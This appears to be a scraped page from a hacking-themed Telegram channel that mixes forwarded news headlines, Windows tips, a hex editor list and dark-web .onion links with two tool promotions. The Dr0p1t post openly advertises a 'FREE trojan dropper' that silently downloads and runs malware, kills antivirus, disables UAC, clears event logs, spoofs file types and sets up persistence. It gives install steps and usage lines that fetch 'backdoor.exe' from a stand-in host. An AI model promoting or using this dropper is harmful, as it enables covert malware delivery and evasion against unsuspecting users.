UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.8K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Forwarded from UNDERCODE NEWS
A Complet Testing Synology with SSD cache.
#Analytiques
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).

F E A T U R E S :

It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.

For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if
you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!

If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.

Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.

Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...


πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) Using pip (The best way to install on any OS):
pip install one-lin3r
one-lin3r -h

2) Using pacman on Black Arch or any arch-based with black

Arch repos:
sudo pacman -S one-lin3r

πŸ¦‘Installing it from GitHub:

1) For windows on cmd with administrator rights : (After downloading ZIP and unzip it)
python -m pip install ./One-Lin3r-master --user
one-lin3r -h

2) For Linux Debian-based distros. (Ex: Kali, Ubuntu..):

> git clone https://github.com/D4Vinci/One-Lin3r.git

> sudo apt install libncurses5-dev

> sudo pip3 install ./One-Lin3r --user
one-lin3r -h

3) For the rest Linux distros.:

> git clone https://github.com/D4Vinci/One-Lin3r.git

> sudo pip3 install ./One-Lin3r --user
one-lin3r -h

TO
USE :
usage: one-lin3r [-h] [-r R] [-x X] [-q]

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
A new way to trick people over the phone has been found by bank fraudsters. They are now intimidated by loans.
#CyberAttacks
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘FREE trojan dropper :

F E A T U R E S :

The executable size is smaller compared to other droppers generated the same way.

Download executable on target system and execute it silently..

Self destruct function so that the dropper will kill and delete itself after finishing it work

Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion

Clear event log after finishing.
+ Framework properties:

Works with Windows, Linux and now have OSX support

Dr0p1t-Server feature (beta) so now you can work from browser See how to work with Dr0p1t-Server

Dr0p1t-Server have a scam option (beta) See how to work with Dr0p1t-Server

Find and kill antivirus before running the malware.

The ability to disable UAC.

The ability to run your malware as admin.

Full spoof by spoofing the file icon and extension to any thing you want.

ZIP files support so now you can compress your executable to zip file before uploading.

Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable

In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it

Adding executable after downloading it to startup.

Adding executable after downloading it to task scheduler ( UAC not matters ).

Adding your file to powershell user profile so your file will be downloaded and ran every time powershell.exe run if it doesn't exist.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

A) On Linux

1) git clone https://github.com/D4Vinci/Dr0p1t-Framework.git

2) chmod 777 -R Dr0p1t-Framework

3) cd Dr0p1t-Framework

4) sudo chmod +x
install.sh

5) ./install.sh

6) python
Dr0p1t.py

B) On Windows (After downloading ZIP and upzip it)

cd Dr0p1t-Framework-master

python -m pip install -r windows_requirements.txt

python
Dr0p1t.py

TO USE :
./
Dr0p1t.py Malware_Url [Options]
./
Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./
Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./
Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./
Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Opticom forms a business alliance with Netflix and develops a pack plan with optical line service.
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

How to close the pximouse process in Win10?

1
) Press the Windows+R key combination on the keyboard at the same time , enter msconfig in the "Run" box, and click "OK" or press the Enter key

2) On the " Startup " tab of the " System Configuration " dialog box , click " Open Task Manager "

3) Right-click on pximouse in the task manager and select " disable "

4) As for the operation method of disabling the pximouse startup item in Windows 10, the editor will demonstrate to everyone here. After following the steps of the editor, the pximouse process will be closed. More exciting content, continue to pay attention to the script home

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Fuji Media HD transfers "Cecile" brand mail order business, Nifty takes over.
#international
Basic hack.pdf
665.4 KB
Note:
AVI - Contains AVI files Cursor - Contains
Cursor files Bitmap - Contains BMP files
Icon - Contains Icons Menu - Contains Menus Dialog - Contains Dialog boxes String Table - Contains Strings Accelerators - Contains Shortcut keys Version Info - Contains Version information of the file
Forwarded from UNDERCODE NEWS
A 12% drop in Bitcoin; "Take the worry out of your heart - this is a healthy fix"
#Analytiques
SOME NEW .ONION LINKS :

SIN – Strategic Intelligence Network – Atlas, Interactive Maps & Library http://4iahqcjrtmxwofr6.onion/ offline

Sign In http://rwgj62oc4dx4nxzt.onion/ oppline
8ch.pl, to be known as vichan.net http://
vichandcxw4gm3wy.onion/ offline

TOR http://godnotaba36dsabv.onion/ online

Login ! This deep web links list is provided by http://

hiddenwikitor.org/ and http://wiki5kauuihowqi5.onion http://talismanrestz7mr.onion/ online

Verified.VC – only checked people http://verified2ebdpvms.onion/ online

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Intel strengthens FPGA accelerator development environment, boards made by other companies are good.
#Technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to change the storage path of cache files in win10:

1) Right-click this computer and click Properties.

2) Click Advanced System Settings.

3) Click Environment Variables.

4) You can see that there are three variables "TEMP", "TMP" and "Path" in the user variables. Note that they are user variables (not system variables), because the cache comes from the user's program.

5) Double-click the variable that needs to be edited or click, click Edit, and modify to the desired path, ps: Create a folder first, and the transferred disk space must be sufficient, the cache will be changed later, and the previous one can be cleaned manually. .

6) In fact, it is best not to modify the cache file, so as not to cause system data loss and instability (if deleted by mistake), we can solve it by increasing the space of the c drive (partition software),

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Facebook paid a million dollar for refusing to transfer Russians’ data to Russia. The threat of blocking looms.
#international
Forwarded from UNDERCODE NEWS
Popular endpoint security solution made by Mobile Iron, exposed to breaches.
#DataBreaches
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

some good hex editors free-

[HxD](https://mh-nexus.de/en/hxd/)

* [010 Editor](http://www.sweetscape.com/010editor/)

* [Hex Workshop](http://www.hexworkshop.com/)

* [HexFiend](http://ridiculousfish.com/hexfiend/)

* [Hiew](http://www.hiew.ru/)

* [hecate](https://github.com/evanmiller/hecate)

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
InterScan Messaging Security expose a critical bugs could allow attackers to gain remotely control.
#Vulnerabilities